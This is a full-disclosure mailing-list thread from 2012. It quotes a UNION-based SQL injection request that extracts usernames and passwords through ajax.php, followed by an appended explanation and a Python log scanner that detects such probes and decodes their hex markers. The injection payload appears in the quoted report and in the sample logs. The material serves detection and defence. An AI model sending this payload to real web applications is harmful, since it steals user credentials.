
List:       full-disclosure
Subject:    Re: [Full-disclosure] New Ajax SQL Injection Exploit?
From:       Julius_Kivimäki <julius.kivimaki () gmail ! com>
Date:       2012-11-30 21:39:07
Message-ID: CAPMrQTSXJNiTxBJArZ2XHkAnAFVNqTqmrOGm-GN5yYW=1b6YXQ () mail ! gmail ! com



Dear all, I'd like to inform you that this exploit is vulnerable to a *
critical* XSS attack that can be used against users of the exploit.
Vendor did not respond to inquiries regarding this *severe* vulnerability.


Regards,
Hot Acid security research team.

Greetz 2:
Mustlive
Vulnerability Lab
2012/11/30 eltra1n <larry.wichman@gmail.com>

> I just detected this being tried against my web apps a few hours ago:
> 
> GET /ajax.php?do=quick_replay&t=7+union+select+1,2,3,concat(0x7a33726f31,username,0x0d0a,password,0x7a33726f32),5,6,username,8,9,10,11,12,13,14,15,16,17+from+user+where+userid=1-- HTTP/1.1
> Host:www.mysite.c0m:80
> Connection:Close
> 
> I ran a Google search of that string and found this:
> 
> http://pastebin.com/xh9xgep7
> 
> Regards,
> Larry
> 



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
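The request Larry quoted is a textbook UNION-based injection: a seventeen-column SELECT so that the injected row matches the width of the original query, with the extracted username and password wrapped in the hex literals 0x7a33726f31 and 0x7a33726f32 (MySQL decodes those to the ASCII strings "z3ro1" and "z3ro2", and 0x0d0a to CRLF) so the attacking tool can pull the credentials out of the returned HTML with a simple regex. The following is an added example, not code from this thread or from any tool it mentions: it scans constructed Apache-style access-log lines for the same pattern, counts the UNION columns (splitting only on top-level commas, so concat(...) counts as one column) and decodes the hex marker literals. The log lines, IP addresses and the function names scan, union_columns and decode_hex_literals are all constructed for illustration.

```python
"""Detect UNION-based SQL injection probes in web access logs and decode the
MySQL 0x... marker literals the attacker wraps around the extracted columns.
Added example for this list archive; log lines below are constructed, not
taken from any real server."""
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined log format), not real data.
# Line 1 mirrors the probe quoted in the thread; line 3 is the same technique
# with a different column count and %20 encoding; line 2 is benign.
SAMPLE_LOG = """\
203.0.113.5 - - [30/Nov/2012:20:11:02 +0000] "GET /ajax.php?do=quick_replay&t=7+union+select+1,2,3,concat(0x7a33726f31,username,0x0d0a,password,0x7a33726f32),5,6,username,8,9,10,11,12,13,14,15,16,17+from+user+where+userid=1-- HTTP/1.1" 200 5120
198.51.100.9 - - [30/Nov/2012:20:11:03 +0000] "GET /ajax.php?do=quick_replay&t=7 HTTP/1.1" 200 4096
203.0.113.5 - - [30/Nov/2012:20:11:04 +0000] "GET /ajax.php?do=quick_replay&t=7%20UNION%20SELECT%201,2,3,concat(0x7a33726f31,user(),0x7a33726f32)--%20- HTTP/1.1" 200 5120
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+)'
)
UNION_RE = re.compile(r'\bunion\b\s+(?:all\s+)?\bselect\b', re.IGNORECASE)
HEX_RE = re.compile(r'0x([0-9a-fA-F]{2,})')


def decode_hex_literals(query: str) -> list:
    """Return the printable ASCII decodings of MySQL 0x... literals in the query.
    Attackers use such literals as markers so a regex can locate the UNION
    output inside the page; non-printable ones (e.g. 0x0d0a, CRLF) are skipped."""
    out = []
    for h in HEX_RE.findall(query):
        try:
            s = bytes.fromhex(h).decode('ascii')
        except (ValueError, UnicodeDecodeError):
            continue  # odd-length or non-ASCII literal: not a marker
        if s.isprintable():
            out.append(s)
    return out


def union_columns(query: str) -> list:
    """Split the UNION SELECT column list on top-level commas, so that
    concat(a,b,c) counts as one column, stopping at FROM or a comment.
    The length of the result is the column count the attacker had to match."""
    m = UNION_RE.search(query)
    if not m:
        return []
    rest = query[m.end():].strip()
    low = rest.lower()
    cols, cur, depth, i = [], [], 0, 0
    while i < len(rest):
        ch = rest[i]
        if depth == 0 and (low.startswith(' from ', i)
                           or low.startswith('--', i) or ch == '#'):
            break
        if ch == '(':
            depth += 1
        elif ch == ')':
            depth -= 1
        if ch == ',' and depth == 0:
            cols.append(''.join(cur).strip())
            cur = []
        else:
            cur.append(ch)
        i += 1
    if ''.join(cur).strip():
        cols.append(''.join(cur).strip())
    return cols


def scan(log_text: str) -> list:
    """Return one finding per request whose decoded query string contains a
    UNION SELECT: source IP, path, UNION column count and decoded markers."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        path, _, raw_query = m.group('path').partition('?')
        query = unquote_plus(raw_query)  # handles both '+' and %20
        if not UNION_RE.search(query):
            continue
        findings.append({
            'ip': m.group('ip'),
            'path': path,
            'columns': len(union_columns(query)),
            'markers': decode_hex_literals(query),
        })
    return findings


if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Run against the constructed log, the first and third lines are flagged with 17 and 4 UNION columns respectively and both carry the "z3ro1"/"z3ro2" markers; matching on those decoded markers, rather than on the literal hex, catches the same tool even when it is pointed at a different column layout.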
